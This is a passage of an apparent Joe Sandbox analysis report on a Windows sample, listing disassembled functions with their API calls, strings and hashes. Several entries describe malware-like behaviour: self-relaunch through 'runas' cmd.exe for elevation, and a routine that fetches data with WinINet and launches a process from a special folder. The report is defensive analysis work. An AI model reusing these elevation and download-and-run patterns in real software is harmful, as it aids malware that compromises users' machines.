                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: __floor_pentium4
                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                        • API String ID: 4168288129-2761157908
                                                        • Opcode ID: 35942fda2d49ed9c0cef35717af70fc9b909b20db9452429e8638ac11cf907dd
                                                        • Instruction ID: 78e568b67073be54a90014ca029ae6799c3a9a957232aaef278a7f2bd52564dd
                                                        • Opcode Fuzzy Hash: 35942fda2d49ed9c0cef35717af70fc9b909b20db9452429e8638ac11cf907dd
                                                        • Instruction Fuzzy Hash: DFD22572E086689FDF65CE28CD487EAB7B5EB44305F1401EAD44DA7240EB78AF818F41
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee952e25a22fe5600719e129e6a69d76954a32707930552934fc297b8667f3ce
                                                        • Instruction ID: 69068c09d87a8bb5b83d7fa88df7c0911154504af13fd9a1f758e137b33028cb
                                                        • Opcode Fuzzy Hash: ee952e25a22fe5600719e129e6a69d76954a32707930552934fc297b8667f3ce
                                                        • Instruction Fuzzy Hash: 3E024C71E01219ABDF14CFA9C884AAEBBF1FF48314F258269E555E7340D731AA45CB90
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C87890
                                                        • IsDebuggerPresent.KERNEL32 ref: 00C8795C
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C87975
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00C8797F
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                        • String ID:
                                                        • API String ID: 254469556-0
                                                        • Opcode ID: 451c5e7f2acb5c22961530c995f0f115759d4593bd8b6380b0fca793ef7b1569
                                                        • Instruction ID: f855e34060a5809ab4e256dea95f7080d0542b9722880a9cbac48e2c67720f3c
                                                        • Opcode Fuzzy Hash: 451c5e7f2acb5c22961530c995f0f115759d4593bd8b6380b0fca793ef7b1569
                                                        • Instruction Fuzzy Hash: 1531D775D052189BDF21EFA4D949BCDBBB8AF08304F1051AAE40CAB290EB759B84DF45
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C8DA70
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C8DA7A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00C8DA87
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: c8287e02865636defeccb73ba546a52c4d924b01239b62fdc56276ce998496aa
                                                        • Instruction ID: f245f40c2c9733c2535a657d600432c7ad393f427d12af05bfd90bca9fd191fb
                                                        • Opcode Fuzzy Hash: c8287e02865636defeccb73ba546a52c4d924b01239b62fdc56276ce998496aa
                                                        • Instruction Fuzzy Hash: A231C9749012189BCB21EF68DD897DCB7B8BF08314F6041EAE41CA7291E7709F859F44
                                                        APIs
                                                        • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000,00000000), ref: 00C85E1C
                                                        • ReadFile.KERNEL32(FFFFFFFF,?,00004000,00004000,00000000,00000000), ref: 00C85E40
                                                        Similarity
                                                        • API ID: File$PointerRead
                                                        • String ID:
                                                        • API String ID: 3154509469-0
                                                        • Opcode ID: 7f97d38b8a99a91e9ee250de9d79a8127270691bb4012db4acc844fe6a45e00f
                                                        • Instruction ID: 2d6a3554a3f9c3a894d1a36867ba48be091c08b2cd4f9036b4c76540beafa0e0
                                                        • Opcode Fuzzy Hash: 7f97d38b8a99a91e9ee250de9d79a8127270691bb4012db4acc844fe6a45e00f
                                                        • Instruction Fuzzy Hash: CCC19C31A00B058FCB24DFAAD8806AAB7F2FF84308F14856ED59697751CB71EE45CB94
                                                        APIs
                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C97862,?,?,00000008,?,?,00C97465,00000000), ref: 00C97A94
                                                        Similarity
                                                        • API ID: ExceptionRaise
                                                        • String ID:
                                                        • API String ID: 3997070919-0
                                                        • Opcode ID: 1c4d6c85be73f7c1eafb0ac6f063230846a80e98fb9b26cd0ba6b7c5b9204603
                                                        • Instruction ID: a3b979e9a4d30e82bc3066ea62df340dbbf2eaa22dd1b43aee53acbaaf5a59ad
                                                        • Opcode Fuzzy Hash: 1c4d6c85be73f7c1eafb0ac6f063230846a80e98fb9b26cd0ba6b7c5b9204603
                                                        • Instruction Fuzzy Hash: F4B17F31625609DFDB19CF28C48AB657BE0FF45364F298658E8E9CF2A1C335DA91CB40
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C87B5E
                                                        Similarity
                                                        • API ID: FeaturePresentProcessor
                                                        • String ID:
                                                        • API String ID: 2325560087-0
                                                        • Opcode ID: c7b3d1239058d30a9726ad8301fdc2e12c73c5b5361111a7545b69fab14240e6
                                                        • Instruction ID: 8bc63d4a7b9a9201df5ee0331a44b10cf8e8e8a49734980ac320c1a05963d0d1
                                                        • Opcode Fuzzy Hash: c7b3d1239058d30a9726ad8301fdc2e12c73c5b5361111a7545b69fab14240e6
                                                        • Instruction Fuzzy Hash: 9D518FB1A042158FEB19CF69D8857AEBBF1FB49318F24862AD415EB250E774DE40CF60
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 8de7ec85767217ba07f813fdb1fa3e2e2966e04cfd7429034460afb7b173811e
                                                        • Instruction ID: f92386f74bbca2c80795d6f7c1494eff8567ede3af334d2a7d0f5d846fcb7daa
                                                        • Opcode Fuzzy Hash: 8de7ec85767217ba07f813fdb1fa3e2e2966e04cfd7429034460afb7b173811e
                                                        • Instruction Fuzzy Hash: 21D1F130A0060A9FCB28EF69C584ABEB7B1FF49318F14461DD5669B795C730AE41CB5C
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee9e197f7c891d3f5866a939c4de651cb651f544e5c7e6be523872b200a5f587
                                                        • Instruction ID: 5c9567796f7786bc255acaa319cbbb89777cd4349dedf8c21f100881ab6a8cf7
                                                        • Opcode Fuzzy Hash: ee9e197f7c891d3f5866a939c4de651cb651f544e5c7e6be523872b200a5f587
                                                        • Instruction Fuzzy Hash: 0A31C672900219AFDB24EFA9CC89EBAB76DEB84358F14416DF815D7240EA309E419B54
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: need dictionary
                                                        • API String ID: 0-853443464
                                                        • Opcode ID: e37ab8d0f7bfb05ca2aea8b16f50c6c5db94d00a04c0ad9d5d6913e0b7f60abf
                                                        • Instruction ID: f5fb38a0c804431da27a84453e60e50dbabde66917f88703a7d102f3923d2959
                                                        • Opcode Fuzzy Hash: e37ab8d0f7bfb05ca2aea8b16f50c6c5db94d00a04c0ad9d5d6913e0b7f60abf
                                                        • Instruction Fuzzy Hash: B8C114B16006018FD774CF1AC880B22FBF4FF59315B24899ED8AACB651D776E942CB50
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00007A1D,00C87271), ref: 00C87A16
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 6005e761c4215fab923f06eac55d1384aae4ecf9b80b8aa6af6c9436501828d6
                                                        • Instruction ID: c1351462f4af830258eee16f07dec28aa9e5c036a62865e4956b58e133c17d83
                                                        • Opcode Fuzzy Hash: 6005e761c4215fab923f06eac55d1384aae4ecf9b80b8aa6af6c9436501828d6
                                                        • Instruction Fuzzy Hash:
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbda7cf880479d6a8690b6adde060dcdb6b41233c359a17f09d265554e36ee1b
                                                        • Instruction ID: 1cc1175875ab38e71387fc6a0c5550f9f2a1c03c58d68fb70b7a29f1b747ad3a
                                                        • Opcode Fuzzy Hash: dbda7cf880479d6a8690b6adde060dcdb6b41233c359a17f09d265554e36ee1b
                                                        • Instruction Fuzzy Hash: 7292F7B5E00259DFCB04DF99C980AADBBF1FF48318F2492A9D415AB351D335AA42CF94
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ada7e8fa614c8bf941aba92b5814df6d46338476cfc7c1c8fcbf84135213c882
                                                        • Instruction ID: 513faa365a274735bd742ace60884bcdd3c696c81114c8e22383b8c8386f8827
                                                        • Opcode Fuzzy Hash: ada7e8fa614c8bf941aba92b5814df6d46338476cfc7c1c8fcbf84135213c882
                                                        • Instruction Fuzzy Hash: A7F1F634E002698FDB24DF28C980B99B7B1FF89318F1481EAD95DA7345DB30AE858F54
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06a48d0307aba045a325c72f661d996e2a0979724963dba45942fa50020af62c
                                                        • Instruction ID: 4f9c738ede039c561b771df11e06f7e5b2ea67faa7d4d90406f36defd4ad647e
                                                        • Opcode Fuzzy Hash: 06a48d0307aba045a325c72f661d996e2a0979724963dba45942fa50020af62c
                                                        • Instruction Fuzzy Hash: A12157305240B28A870C8B3DAC26537FB91DB5720378B47BFE9D7DA0C6D52AE564D7A0

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00C82534
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8253D
                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00C8254A
                                                        • GetProcessHeap.KERNEL32(00000008,0000026A), ref: 00C82557
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8255A
                                                        • wsprintfW.USER32 ref: 00C82567
                                                        • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000,00000000,00000000), ref: 00C82587
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C82593
                                                        • HeapFree.KERNEL32(00000000), ref: 00C8259C
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C825A1
                                                        • HeapFree.KERNEL32(00000000), ref: 00C825A4
                                                        • ExitProcess.KERNEL32 ref: 00C825A8
                                                        Strings
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree$ExecuteExitFileModuleNameShellwsprintf
                                                        • String ID: /c "%s"$cmd.exe$runas
                                                        • API String ID: 3385381366-213241364
                                                        • Opcode ID: 7a681f715dbc2c23e0a673381856a14f167c9e904d0ee278fe12023dc80c8053
                                                        • Instruction ID: 742754749a1b4a1b88b388e29310723a15aa3f702653f700fa6e31b11672cc4e
                                                        • Opcode Fuzzy Hash: 7a681f715dbc2c23e0a673381856a14f167c9e904d0ee278fe12023dc80c8053
                                                        • Instruction Fuzzy Hash: 4F01FF71E803147AEB10A7A65C4EF5F7E6CFB5DB55F001055F708A71D0C9B49900DA65
                                                        APIs
                                                          • Part of subcall function 00C825B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 00C825E1
                                                          • Part of subcall function 00C825B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00C825FB
                                                          • Part of subcall function 00C825B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00C82644
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 00C8265A
                                                          • Part of subcall function 00C825B0: HeapAlloc.KERNEL32(00000000), ref: 00C8265D
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 00C826AA
                                                          • Part of subcall function 00C825B0: RtlAllocateHeap.NTDLL(00000000), ref: 00C826AD
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C826D7
                                                          • Part of subcall function 00C825B0: RtlFreeHeap.NTDLL(00000000), ref: 00C826DA
                                                          • Part of subcall function 00C825B0: InternetCloseHandle.WININET(?), ref: 00C826E6
                                                          • Part of subcall function 00C825B0: InternetCloseHandle.WININET(?), ref: 00C826F3
                                                        • GetProcessHeap.KERNEL32(00000000,0000020A), ref: 00C818A0
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C818A3
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000), ref: 00C818B6
                                                          • Part of subcall function 00C86DD0: GetCurrentDirectoryW.KERNEL32(00000103,00000244,?,?,?,00000000,000000FF), ref: 00C86E5D
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A,00000000,00000000,000000FF,?), ref: 00C81989
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8198C
                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 00C819AA
                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,00000000,00000000), ref: 00C81A1A
                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00C81A2A
                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00C81A36
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00C81A45
                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 00C81A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Internet$CloseHandle$Alloc$FreeOpenPath$AllocateCombineCreateCurrentDirectoryFileFolderReadSpecial
                                                        • String ID: D
                                                        • API String ID: 2613224297-2746444292
                                                        • Opcode ID: 38241c9eacdde098594167fef4377c0d5e652a6f2b78735c41b311b5776d74e7
                                                        • Instruction ID: 489929afab28536fcb1726e9acddd14abe83fae4010fae2b1a38ad47f8406043
                                                        • Opcode Fuzzy Hash: 38241c9eacdde098594167fef4377c0d5e652a6f2b78735c41b311b5776d74e7
                                                        • Instruction Fuzzy Hash: D5519131A012189BDB20AF64DC5DBAE77B8FF48705F1401AEE959AB290DB309A45CF58
                                                        APIs
                                                        • type_info::operator==.LIBVCRUNTIME ref: 00C88DDA
                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00C88EE8
                                                        • _UnwindNestedFrames.LIBCMT ref: 00C8903A
                                                        • CallUnexpected.LIBVCRUNTIME ref: 00C89055
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 2751267872-393685449
                                                        • Opcode ID: dc5ed1a2a91a28ce6ca58b1ad821dfcff9d914c0cb4acb8b4ec6e06ac6e9fbc5
                                                        • Instruction ID: 7dcd94f20f229e8c58ccd2c0862a1b2ddcb183f8b53d548ad1e291d48939041c
                                                        • Opcode Fuzzy Hash: dc5ed1a2a91a28ce6ca58b1ad821dfcff9d914c0cb4acb8b4ec6e06ac6e9fbc5
                                                        • Instruction Fuzzy Hash: 73B1BD31800209EFCF15FFA4C8809AEB7B5FF14318F94415AE9116BA12DB30EE55DB99
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: _strrchr
                                                        • String ID:
                                                        • API String ID: 3213747228-0
                                                        • Opcode ID: bae61aaf466f51dc2cfca6d4b3cb37822215d39356c954e04fc30a487091a812
                                                        • Instruction ID: 6ccf269cd5f745b1ade877cbcd9be19aee200b70352ecc94059d6c116dee3b8c
                                                        • Opcode Fuzzy Hash: bae61aaf466f51dc2cfca6d4b3cb37822215d39356c954e04fc30a487091a812
                                                        • Instruction Fuzzy Hash: FAB17972A003659FDB11AF64CC81BBE7BA5EF56318F144165E914EB382D770DE01C7A8
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 00C88577
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00C8857F
                                                        • _ValidateLocalCookies.LIBCMT ref: 00C88608
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00C88633
                                                        • _ValidateLocalCookies.LIBCMT ref: 00C88688
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 1170836740-1018135373
                                                        • Opcode ID: e97b15a1cb8d87377fad422e89169f55b71c53ffdbe772df19e3e1227ceedc98
                                                        • Instruction ID: acb43bb19beb8fc67f415b3c52bf219f8e4721227a0acde0a7aba590cbcfbade
                                                        • Opcode Fuzzy Hash: e97b15a1cb8d87377fad422e89169f55b71c53ffdbe772df19e3e1227ceedc98
                                                        • Instruction Fuzzy Hash: 3341D934A002189BCF10EF68C884A9EBBB5FF45318F548159F819AB792DB31DE09CB95
                                                        APIs
                                                        • FreeLibrary.KERNEL32(00000000,?,00C912F2,CA1DECC3,0000044C,00000000,00000000,?,?,00C9144C,00000022,FlsSetValue,00C9B244,00C9B24C,00000000), ref: 00C912A4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3664257935-537541572
                                                        • Opcode ID: df24293b1cd3a30d3912aaeac04c3f05f2bec86c48fc10397cc2c4090aa30abe
                                                        • Instruction ID: c0278719875413571ad540086e713df8400f7ac35441684eff8edaa7b1cc1e23
                                                        • Opcode Fuzzy Hash: df24293b1cd3a30d3912aaeac04c3f05f2bec86c48fc10397cc2c4090aa30abe
                                                        • Instruction Fuzzy Hash: B121F371A01612ABDF21AB69DC4EB5E7768EB12760F280115EC22E72D0D730EE01C6E0
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00C8897B,00C884E3,00C87A61), ref: 00C88992
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C889A0
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C889B9
                                                        • SetLastError.KERNEL32(00000000,00C8897B,00C884E3,00C87A61), ref: 00C88A0B
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: 790ded7fd4b0881d6afd9fbf453da464caf5df6080562558215d4fa14723f256
                                                        • Instruction ID: 28c838be84f1fa6d9bc2d1fe6c2e8c01606370285a63532368603bbda6c27cb8
                                                        • Opcode Fuzzy Hash: 790ded7fd4b0881d6afd9fbf453da464caf5df6080562558215d4fa14723f256
                                                        • Instruction Fuzzy Hash: 7B01D8321183219EE62436B97C85BBE2B45FB0277C760022AF121464E1EF625C04A35D
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CA1DECC3,?,?,00000000,00C9861B,000000FF,?,00C8CFE3,00C8D0C7,?,00C8CFB7,00000000), ref: 00C8D03C
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C8D04E
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00C9861B,000000FF,?,00C8CFE3,00C8D0C7,?,00C8CFB7,00000000), ref: 00C8D070
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: d29de6d4811026d3799a4632144adfc7abd214bf726b6f9563bcd85054a44e7a
                                                        • Instruction ID: 6d07f39614a871692559501f0af62350196a81ee3afd04b1f0adc4ddfe621973
                                                        • Opcode Fuzzy Hash: d29de6d4811026d3799a4632144adfc7abd214bf726b6f9563bcd85054a44e7a
                                                        • Instruction Fuzzy Hash: DD01A271904615AFDB219F58DC0DBAEBBB8FB49B14F00452AF822A26D0DB759A00CB90
                                                        APIs
                                                        • __alloca_probe_16.LIBCMT ref: 00C94655
                                                        • __alloca_probe_16.LIBCMT ref: 00C9471E
                                                        • __freea.LIBCMT ref: 00C94785
                                                          • Part of subcall function 00C8DC7F: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00C8718C,00000000,?,00C86E07,0000044C,CA1DECC3,771AF380,00000000,00000000,000000FF,?,00C814D5), ref: 00C8DCB1
                                                        • __freea.LIBCMT ref: 00C94798
                                                        • __freea.LIBCMT ref: 00C947A5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1423051803-0
                                                        • Opcode ID: eafc3c34dc5cb12c941012dec559221683e18d52709cfb88a0c7cf219c36b3df
                                                        • Instruction ID: 0626c4700beb15d422e5c5fc5c79f8323a2976dfb574370cfea13d806fced37f
                                                        • Opcode Fuzzy Hash: eafc3c34dc5cb12c941012dec559221683e18d52709cfb88a0c7cf219c36b3df
                                                        • Instruction Fuzzy Hash: C451D57260020AAFEF285FA5CC89EBB7BA9EF86714F150129FD14D7251EB30DD12D660
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C89A53,00000000,?,00CA2CE0,?,?,?,00C89BF6,00000004,InitializeCriticalSectionEx,00C99D38,InitializeCriticalSectionEx), ref: 00C89AAF
                                                        • GetLastError.KERNEL32(?,00C89A53,00000000,?,00CA2CE0,?,?,?,00C89BF6,00000004,InitializeCriticalSectionEx,00C99D38,InitializeCriticalSectionEx,00000000,?,00C899AD), ref: 00C89AB9
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C89AE1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID: api-ms-
                                                        • API String ID: 3177248105-2084034818
                                                        • Opcode ID: 4ad589ac57cd1baf47741338c88147d93c1a611783659a68a71461c8bfde2a03
                                                        • Instruction ID: 876bfff1caba7d58f9f2d0457664dfeb74b12a75e33221fddde78a829ed722c4
                                                        • Opcode Fuzzy Hash: 4ad589ac57cd1baf47741338c88147d93c1a611783659a68a71461c8bfde2a03
                                                        • Instruction Fuzzy Hash: B4E04830280305B7EF202BA5DC0EB6D3F64EB40B54F144025F90CA40E1D772DA119788
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32(CA1DECC3,00000000,00000000,?), ref: 00C94B00
